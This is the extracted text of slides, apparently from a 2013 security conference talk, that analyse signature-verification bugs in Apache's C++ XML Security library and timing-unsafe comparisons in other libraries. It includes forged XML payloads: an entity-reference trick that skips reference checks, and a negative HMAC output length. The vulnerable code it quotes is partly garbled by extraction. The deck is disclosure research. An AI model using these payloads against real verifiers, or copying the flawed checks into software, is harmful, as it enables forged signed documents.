![Page 60: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/60.jpg)
CVE-2013-2153
bool DSIGSignature::verify(void) {
// First thing to do is check the references bool referenceCheckResult = mp_signedInfo->verify();
// Check the signature bool sigVfyResult = verifySignatureOnlyInternal();
return sigVfyResult & referenceCheckResult; }
// ------------------------------------------// Verify each reference element // ------------------------------------------
bool DSIGSignedInfo::verify() { return DSIGReference::verifyReferenceList(mp_referenceList);
}
bool DSIGReference::verifyReferenceList(DSIGReferenceList * lst) { // Run through a list of hashes and checkHash for each one bool res = true; int size = lst->getSize(); for (int i = 0; i < size; ++i) {
if (lst->item(i)->checkHash()) { res = false;
} }
return res; }
![Page 61: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/61.jpg)
CVE-2013-2153
bool DSIGSignature::verify(void) {
// First thing to do is check the references bool referenceCheckResult = mp_signedInfo->verify();
// Check the signature bool sigVfyResult = verifySignatureOnlyInternal();
return sigVfyResult & referenceCheckResult; }
// ------------------------------------------// Verify each reference element // ------------------------------------------
bool DSIGSignedInfo::verify() { return DSIGReference::verifyReferenceList(mp_referenceList);
}
bool DSIGReference::verifyReferenceList(DSIGReferenceList * lst) { // Run through a list of hashes and checkHash for each one bool res = true; int size = lst->getSize(); for (int i = 0; i < size; ++i) {
if (lst->item(i)->checkHash()) { res = false;
} }
return true; }
![Page 62: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/62.jpg)
CVE-2013-2153
void DSIGSignedInfo::load(void) {
DOMNode * child = mp_signedInfoNode->getFirstChild(); // Load rest of SignedInfo...
// Now look at references....child = child->getNextSibling();
// Run through the rest of the elements until donewhile (child != 0 && (child->getNodeType() != DOMNode::ELEMENT_NODE))
// Skip text and commentschild = child->getNextSibling();
if (child != NULL) // Have an element node - should be a reference, so let's load the listmp_referenceList = DSIGReference::loadReferenceListFromXML(mp_env, child);
}
![Page 63: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/63.jpg)
CVE-2013-2153
void DSIGSignedInfo::load(void) {
DOMNode * child = mp_signedInfoNode->getFirstChild(); // Load rest of SignedInfo...
// Now look at references.... child = child->getNextSibling();
// Run through the rest of the elements until done while (child != 0 && (child->getNodeType() != DOMNode::ELEMENT_NODE))
// Skip text and comments child = child->getNextSibling();
if (child != NULL) // Have an element node - should be a reference, so let's load the list mp_referenceList = DSIGReference::loadReferenceListFromXML(mp_env, child);
}
![Page 64: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/64.jpg)
CVE-2013-2153
void DSIGSignedInfo::load(void) {
DOMNode * child = mp_signedInfoNode->getFirstChild(); // Load rest of SignedInfo...
// Now look at references....child = child->getNextSibling();
// Run through the rest of the elements until donewhile (child != 0 && (child->getNodeType() != DOMNode::ELEMENT_NODE))
// Skip text and commentschild = child->getNextSibling();
if (child != NULL) // Have an element node - should be a reference, so let's load the list mp_referenceList = DSIGReference::loadReferenceListFromXML(mp_env, child);
}
![Page 65: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/65.jpg)
CVE-2013-2153
void DSIGSignedInfo::load(void) {
DOMNode * child = mp_signedInfoNode->getFirstChild(); // Load rest of SignedInfo...
// Now look at references.... child = child->getNextSibling();
// Run through the rest of the elements until done while (child != 0 && (child->getNodeType() != DOMNode::ELEMENT_NODE))
// Skip text and comments child = child->getNextSibling();
if (child != NULL) // Have an element node - should be a reference, so let's load the listmp_referenceList = DSIGReference::loadReferenceListFromXML(mp_env, child);
}
![Page 66: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/66.jpg)
Parsed DOM Tree
ELEMENT_NODE
<SignedInfo>
ELEMENT_NODE
<C14NMethod>
ELEMENT_NODE
<SignatureMethod>
ELEMENT_NODE
<Reference>
ELEMENT_NODE
<Transforms>
ELEMENT_NODE
<Digest>
DSIGSignedInfo::load()
![Page 67: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/67.jpg)
Parsed DOM Tree
ELEMENT_NODE
<SignedInfo>
ELEMENT_NODE
<C14NMethod>
ELEMENT_NODE
<SignatureMethod>
Not an ELEMENT_NODE
ELEMENT_NODE
<Reference>
Ignored
DSIGSignedInfo::load()
![Page 68: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/68.jpg)
Parsed DOM Tree
ELEMENT_NODE
<SignedInfo>
ELEMENT_NODE
<C14NMethod>
ELEMENT_NODE
<SignatureMethod>
Not an ELEMENT_NODE
ELEMENT_NODE
<Reference>
DSIGSignedInfo::load()
Ignored
![Page 69: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/69.jpg)
DOM Node TypesRef: http://www.w3.org/TR/REC-DOM-Level-1/level-one-core.html#ID-1590626201
Node Type Child Types
Attribute Text, EntityReference
CDATASection None
Comment None
Document Element, ProcessInstruction, Comment, DocumentType
Element Element, Text, Comment, ProcessingInstruction, CDATASection, EntityReference
Entity Element, ProcessingInstruction, Comment, Text, CDATASection, EntityReference
EntityReference Element, ProcessingInstruction, Comment, Text, CDATASection, EntityReference
ProcessingInstruction None
![Page 70: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/70.jpg)
DOM Node TypesRef: http://www.w3.org/TR/REC-DOM-Level-1/level-one-core.html#ID-1590626201
Node Type Child Types
Attribute Text, EntityReference
CDATASection None
Comment None
Document Element, ProcessInstruction, Comment, DocumentType
Element Element, Text, Comment, ProcessingInstruction, CDATASection, EntityReference
Entity Element, ProcessingInstruction, Comment, Text, CDATASection, EntityReference
EntityReference Element, ProcessingInstruction, Comment, Text, CDATASection, EntityReference
ProcessingInstruction None
![Page 71: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/71.jpg)
DOM Node TypesRef: http://www.w3.org/TR/REC-DOM-Level-1/level-one-core.html#ID-1590626201
Node Type Child Types
Attribute Text, EntityReference
CDATASection None
Comment None
Document Element, ProcessInstruction, Comment, DocumentType
Element Element, Text, Comment, ProcessingInstruction, CDATASection, EntityReference
Entity Element, ProcessingInstruction, Comment, Text, CDATASection, EntityReference
EntityReference Element, ProcessingInstruction, Comment, Text, CDATASection, EntityReference
ProcessingInstruction None
![Page 72: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/72.jpg)
Entity References
ELEMENT_NODE
<good>
ELEMENT_NODE
<a>
ENTITY_REF_NODE
&ent;
ELEMENT_NODE
<b>
ELEMENT_NODE
<c>
<!DOCTYPE good [<!ENTITY ent "<b/>">
]><good><a/>&ent;<c/>
</good>
![Page 73: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/73.jpg)
Canonical Entity References
Ref: http://www.w3.org/TR/xml-c14n
![Page 74: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/74.jpg)
Entity References after C14N
ELEMENT_NODE
<good>
ELEMENT_NODE
<a>
ELEMENT_NODE
<b>
ELEMENT_NODE
<c>
<good><a/><b/><c/>
</good>
![Page 75: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/75.jpg)
Exploiting It
<good><Signature xmlns="http://www.w3.org/2000/09/xmldsig#">
<SignedInfo><CanonicalizationMethod/><SignatureMethod/><Reference URI="">
<Transforms/><DigestMethod/><DigestValue>C2pG</DigestValue>
</Reference></SignedInfo><SignatureValue>B9OL</SignatureValue>
</Signature></good>
![Page 76: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/76.jpg)
Exploiting It
<!DOCTYPE good [<!ENTITY hacked "<Reference URI="">...</Reference>">
]><good>
<Signature xmlns="http://www.w3.org/2000/09/xmldsig#"><SignedInfo>
<CanonicalizationMethod/><SignatureMethod/><Reference URI="">
<Transforms/><DigestMethod/><DigestValue>C2pG</DigestValue>
</Reference></SignedInfo><SignatureValue>B9OL</SignatureValue>
</Signature></good>
![Page 77: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/77.jpg)
Exploiting It
<!DOCTYPE good [<!ENTITY hacked "<Reference URI="">...</Reference>">
]><good>
<Signature xmlns="http://www.w3.org/2000/09/xmldsig#"><SignedInfo>
<CanonicalizationMethod/><SignatureMethod/>&hacked;
</SignedInfo><SignatureValue>B9OL</SignatureValue>
</Signature></good>
![Page 78: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/78.jpg)
Parsed DOM Tree
ELEMENT_NODE
<SignedInfo>
ELEMENT_NODE
<C14NMethod>
ELEMENT_NODE
<SignatureMethod>
ENTITY_REF_NODE
&hacked;
ELEMENT_NODE
<Reference>
Ignored
DSIGSignedInfo::load()
![Page 79: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/79.jpg)
SignedInfo Verification
![Page 80: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/80.jpg)
CVE-2013-2155
• Affected Apache C++ (again)
• Circumvented "fix" for HMAC
Truncation (CVE-2009-0217)
• By sheer ineptitude it ended up an DoS
rather than a Signature Bypass
![Page 81: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/81.jpg)
Background CVE-2009-0217
![Page 82: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/82.jpg)
<SignedInfo> <CanonicalizationMethod
Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/> <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#hmac-sha1">
<HMACOutputLength>80</HMACOutputLength></SignatureMethod>
...</SignedInfo>
HMAC Truncation
00112233445566778899AABBCCDDEEFF00112233
00112233445566778899
Truncate to 80 bits
![Page 83: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/83.jpg)
<SignedInfo> <CanonicalizationMethod
Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/> <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#hmac-sha1">
<HMACOutputLength>0</HMACOutputLength></SignatureMethod>
...</SignedInfo>
HMAC Truncation
00112233445566778899AABBCCDDEEFF00112233
Truncate to 0 bits
![Page 84: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/84.jpg)
CVE-2013-2155
while (child && strcmp(getDSIGLocalName(child, "HMACOutputLength") != 0)child = child->getNextSibling();
if (child) { // Have a max output value!DOMNode *textNode = child->getFirstChild(); if (textNode) {
m_HMACOutputLength = atoi(textNode->getNodeValue()); }
}
![Page 85: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/85.jpg)
CVE-2013-2155
while (child && strcmp(getDSIGLocalName(child, "HMACOutputLength") != 0)child = child->getNextSibling();
if (child) { // Have a max output value! DOMNode *textNode = child->getFirstChild(); if (textNode) {
m_HMACOutputLength = atoi(textNode->getNodeValue()); }
}
![Page 86: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/86.jpg)
CVE-2013-2155
while (child && strcmp(getDSIGLocalName(child, "HMACOutputLength") != 0)child = child->getNextSibling();
if (child) { // Have a max output value!DOMNode *textNode = child->getFirstChild(); if (textNode) {
m_HMACOutputLength = atoi(textNode->getNodeValue()); }
}
![Page 87: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/87.jpg)
CVE-2013-2155
while (child && strcmp(getDSIGLocalName(child, "HMACOutputLength") != 0)child = child->getNextSibling();
if (child) { // Have a max output value! DOMNode *textNode = child->getFirstChild(); if (textNode) {
m_HMACOutputLength = atoi(textNode->getNodeValue()); }
}
So m_HMACOutputLength is an int?
![Page 88: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/88.jpg)
CVE-2013-2155
while (child && strcmp(getDSIGLocalName(child, "HMACOutputLength") != 0)child = child->getNextSibling();
if (child) { // Have a max output value! DOMNode *textNode = tmpSOV->getFirstChild(); if (textNode) {
m_HMACOutputLength = atoi(textNode->getNodeValue()); }
}
// First find the appropriate handler for the URIXSECAlgorithmHandler* handler =
mapURIToHandler(mp_signedInfo->getAlgorithmURI());
bool sigVfyRet = handler->verifyBase64Signature(m_signatureValueSB.rawCharBuffer(),mp_signedInfo->getHMACOutputLength(),mp_signingKey);
![Page 89: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/89.jpg)
CVE-2013-2155
while (child && strcmp(getDSIGLocalName(child, "HMACOutputLength") != 0)child = child->getNextSibling();
if (child) { // Have a max output value! DOMNode *textNode = tmpSOV->getFirstChild(); if (textNode) {
m_HMACOutputLength = atoi(textNode->getNodeValue()); }
}
// First find the appropriate handler for the URI XSECAlgorithmHandler* handler =
mapURIToHandler(mp_signedInfo->getAlgorithmURI());
bool sigVfyRet = handler->verifyBase64Signature(m_signatureValueSB.rawCharBuffer(),mp_signedInfo->getHMACOutputLength(),mp_signingKey);
![Page 90: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/90.jpg)
CVE-2013-2155
bool verifyBase64Signature(const char * sig, unsigned int outputLen, const char * hash, unsigned int hashLen, XSECCryptoKeyType type) {
if(type == XSECCryptoKey::KEY_HMAC) : // FIX: CVE-2009-0217if (outputLen > 0 && (outputLen < 80 || outputLen < hashLen / 2)) {
throw XSECException("HMACOutputLength set to unsafe value."); }
return compareBase64StringToRaw(sig, hash, hashLen, outputLen);}
![Page 91: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/91.jpg)
CVE-2013-2155
bool verifyBase64Signature(const char * sig, unsigned int outputLen, const char * hash, unsigned int hashLen, XSECCryptoKeyType type) {
if(type == XSECCryptoKey::KEY_HMAC) : // FIX: CVE-2009-0217if (outputLen > 0 && (outputLen < 80 || outputLen < hashLen / 2)) {
throw XSECException("HMACOutputLength set to unsafe value."); }
return compareBase64StringToRaw(sig, hash, hashLen, outputLen);}
![Page 92: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/92.jpg)
CVE-2013-2155
bool verifyBase64Signature(const char * sig, unsigned int outputLen, const char * hash, unsigned int hashLen, XSECCryptoKeyType type) {
if(type == XSECCryptoKey::KEY_HMAC) : // FIX: CVE-2009-0217if (outputLen > 0 && (outputLen < 80 || outputLen < hashLen / 2)) {
throw XSECException("HMACOutputLength set to unsafe value."); }
return compareBase64StringToRaw(sig, hash, hashLen, outputLen);}
![Page 93: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/93.jpg)
CVE-2013-2155bool compareBase64StringToRaw(
const char * b64Str,unsigned char * raw,unsigned int rawLen,unsigned int maxCompare) {
unsigned int maxBytes, maxBits;div_t d = {0};if(maxCompare == 0) {
maxCompare = rawLen;}
d = div(maxCompare, 8);maxBytes = d.quot;maxBits = d.rem;
return compareBits(decode(b64Str), raw, maxBytes, maxBits);}
![Page 94: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/94.jpg)
CVE-2013-2155bool compareBase64StringToRaw(
const char * b64Str,unsigned char * raw,unsigned int rawLen,unsigned int maxCompare) {
unsigned int maxBytes, maxBits;div_t d = {0};if(maxCompare == 0) {
maxCompare = rawLen;}
d = div(maxCompare, 8);maxBytes = d.quot;maxBits = d.rem;
return compareBits(decode(b64Str), raw, maxBytes, maxBits);}
![Page 95: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/95.jpg)
CVE-2013-2155bool compareBase64StringToRaw(
const char * b64Str,unsigned char * raw,unsigned int rawLen,unsigned int maxCompare) {
unsigned int maxBytes, maxBits;div_t d = {0};if(maxCompare == 0) {
maxCompare = rawLen;}
d = div(maxCompare, 8);maxBytes = d.quot;maxBits = d.rem;
return compareBits(decode(b64Str), raw, maxBytes, maxBits);}
bool compareBits(const unsigned char* b64Str,const unsigned char* raw,unsigned int maxBytes,unsigned int maxBits) {
unsigned int i, j; for (i = 0; i < maxBytes; ++ i) {
if (raw[i] != outputStr[i]) return false;
}
char mask = 0x01; for (j = 0 ; j < maxBits; ++i) {
if ((raw[i] & mask) != (outputStr[i] & mask))return false;
mask = mask << 1; }return true;
}
![Page 96: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/96.jpg)
CVE-2013-2155bool compareBase64StringToRaw(
const char * b64Str,unsigned char * raw,unsigned int rawLen,unsigned int maxCompare) {
unsigned int maxBytes, maxBits;div_t d = {0};if(maxCompare == 0) {
maxCompare = rawLen;}
d = div(maxCompare, 8);maxBytes = d.quot;maxBits = d.rem;
return compareBits(decode(b64Str), raw, maxBytes, maxBits);}
bool compareBits(const unsigned char* b64Str,const unsigned char* raw,unsigned int maxBytes,unsigned int maxBits) {
unsigned int i, j; for (i = 0; i < maxBytes; ++ i) {
if (raw[i] != outputStr[i]) return false;
}
char mask = 0x01; for (j = 0 ; j < maxBits; ++i) {
if ((raw[i] & mask) != (outputStr[i] & mask))return false;
mask = mask << 1; }return true;
}
![Page 97: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/97.jpg)
CVE-2013-2155bool compareBase64StringToRaw(
const char * b64Str,unsigned char * raw,unsigned int rawLen,unsigned int maxCompare) {
unsigned int maxBytes, maxBits;div_t d = {0};if(maxCompare == 0) {
maxCompare = rawLen;}
d = div(maxCompare, 8);maxBytes = d.quot;maxBits = d.rem;
return compareBits(decode(b64Str), raw, maxBytes, maxBits);}
bool compareBits(const unsigned char* b64Str,const unsigned char* raw,unsigned int maxBytes,unsigned int maxBits) {
unsigned int i, j; for (i = 0; i < maxBytes; ++ i) {
if (raw[i] != outputStr[i]) return false;
}
char mask = 0x01; for (j = 0 ; j < maxBits; ++i) {
if ((raw[i] & mask) != (outputStr[i] & mask))return false;
mask = mask << 1; }return true;
}
![Page 98: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/98.jpg)
Div Function
![Page 99: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/99.jpg)
Div Function
HMACOutputLength = -1
maxCompare = 0xFFFFFFFF
d.quot = 0, d.rem = -1
maxBytes = 0, maxBits = 0xFFFFFFFF
![Page 100: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/100.jpg)
<SignedInfo> <CanonicalizationMethod
Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/> <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#hmac-sha1">
<HMACOutputLength>-1</HMACOutputLength></SignatureMethod>
...</SignedInfo>
Exploiting
00112233445566778899AABBCCDDEEFF00112233
00
Truncate to 8 bits
![Page 101: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/101.jpg)
DoS Only bool compareBase64StringToRaw(
const char * b64Str,unsigned char * raw,unsigned int rawLen,unsigned int maxCompare) {
unsigned int maxBytes, maxBits;div_t d = {0};if(maxCompare == 0) {
maxCompare = rawLen;}
d = div(maxCompare, 8);maxBytes = d.quot;maxBits = d.rem;
return compareBits(decode(b64Str), raw, maxBytes, maxBits);}
bool compareBits(const unsigned char* b64Str,const unsigned char* raw,unsigned int maxBytes,unsigned int maxBits) {
unsigned int i, j; for (i = 0; i < maxBytes; ++ i) {
if (raw[i] != outputStr[i]) return false;
}
char mask = 0x01; for (j = 0 ; j < maxBits; ++i) {
if ((raw[i] & mask) != (outputStr[i] & mask))return false;
mask = mask << 1; }return true;
}
![Page 102: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/102.jpg)
DoS Only bool compareBase64StringToRaw(
const char * b64Str,unsigned char * raw,unsigned int rawLen,unsigned int maxCompare) {
unsigned int maxBytes, maxBits;div_t d = {0};if(maxCompare == 0) {
maxCompare = rawLen;}
d = div(maxCompare, 8);maxBytes = d.quot;maxBits = d.rem;
return compareBits(decode(b64Str), raw, maxBytes, maxBits);}
bool compareBits(const unsigned char* b64Str,const unsigned char* raw,unsigned int maxBytes,unsigned int maxBits) {
unsigned int i, j; for (i = 0; i < maxBytes; ++ i) {
if (raw[i] != outputStr[i]) return false;
}
char mask = 0x01; for (j = 0 ; j < maxBits; ++i) {
if ((raw[i] & mask) != (outputStr[i] & mask))return false;
mask = mask << 1; }return true;
}
![Page 103: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/103.jpg)
DoS Only bool compareBase64StringToRaw(
const char * b64Str,unsigned char * raw,unsigned int rawLen,unsigned int maxCompare) {
unsigned int maxBytes, maxBits;div_t d = {0};if(maxCompare == 0) {
maxCompare = rawLen;}
d = div(maxCompare, 8);maxBytes = d.quot;maxBits = d.rem;
return compareBits(decode(b64Str), raw, maxBytes, maxBits);}
bool compareBits(const unsigned char* b64Str,const unsigned char* raw,unsigned int maxBytes,unsigned int maxBits) {
unsigned int i, j; for (i = 0; i < maxBytes; ++ i) {
if (raw[i] != outputStr[i]) return false;
}
char mask = 0x01; for (j = 0 ; j < maxBits; ++i) {
if ((raw[i] & mask) != (outputStr[i] & mask))return false;
mask = mask << 1; }return true;
}
![Page 104: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/104.jpg)
Non-Constant Time Comparebool compareBits(const unsigned char* b64Str,
const unsigned char* raw,unsigned int maxBytes,unsigned int maxBits) {
unsigned int i, j; for (i = 0; i < maxBytes; ++ i) {
if (raw[i] != outputStr[i]) return false;
}
char mask = 0x01; for (j = 0 ; j < maxBits; ++i) {
if ((raw[i] & mask) != (outputStr[i] & mask))return false;
mask = mask << 1; }return true;
}
![Page 105: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/105.jpg)
Non-Constant Time Comparebool compareBits(const unsigned char* b64Str,
const unsigned char* raw,unsigned int maxBytes,unsigned int maxBits) {
unsigned int i, j; for (i = 0; i < maxBytes; ++ i) {
if (raw[i] != outputStr[i]) return false;
}
char mask = 0x01; for (j = 0 ; j < maxBits; ++i) {
if ((raw[i] & mask) != (outputStr[i] & mask))return false;
mask = mask << 1; }return true;
}
// Monobool Compare (byte[] expected, byte[] actual) {
for (int i=0; i < l; i++) {if (expected[i] != actual[i])
return false;}return true;
}
![Page 106: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/106.jpg)
Non-Constant Time Comparebool compareBits(const unsigned char* b64Str,
const unsigned char* raw,unsigned int maxBytes,unsigned int maxBits) {
unsigned int i, j; for (i = 0; i < maxBytes; ++ i) {
if (raw[i] != outputStr[i]) return false;
}
char mask = 0x01; for (j = 0 ; j < maxBits; ++i) {
if ((raw[i] & mask) != (outputStr[i] & mask))return false;
mask = mask << 1; }return true;
}
// Mono bool Compare (byte[] expected, byte[] actual) {
for (int i=0; i < l; i++) {if (expected[i] != actual[i])
return false;}return true;
}
// .NETbool CheckSignedInfo(KeyedHashAlgorithm macAlg) {
for (int i = 0; i < this.m_signature.SignatureValue.Length; i++){
if (m_signature.SignatureValue[i] != actualHashValue[i]){
return false;}
}return true;
}
![Page 107: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/107.jpg)
Non-Constant Time Comparebool compareBits(const unsigned char* b64Str,
const unsigned char* raw,unsigned int maxBytes,unsigned int maxBits) {
unsigned int i, j; for (i = 0; i < maxBytes; ++ i) {
if (raw[i] != outputStr[i]) return false;
}
char mask = 0x01; for (j = 0 ; j < maxBits; ++i) {
if ((raw[i] & mask) != (outputStr[i] & mask))return false;
mask = mask << 1; }return true;
}
// Mono bool Compare (byte[] expected, byte[] actual) {
for (int i=0; i < l; i++) {if (expected[i] != actual[i])
return false;}return true;
}
// .NET bool CheckSignedInfo(KeyedHashAlgorithm macAlg) {
for (int i = 0; i < this.m_signature.SignatureValue.Length; i++){
if (m_signature.SignatureValue[i] != actualHashValue[i]){
return false;}
}return true;
}
// XMLSEC1if((dataSize > 1) && (memcmp(ctx->dgst, data, dataSize - 1) != 0)){
transform->status = xmlSecTransformStatusFail; return(0);
}
transform->status = xmlSecTransformStatusOk;return(0);
![Page 108: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/108.jpg)
Back to the original story...
![Page 109: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/109.jpg)
CVE-2013-1336/CVE-2013-
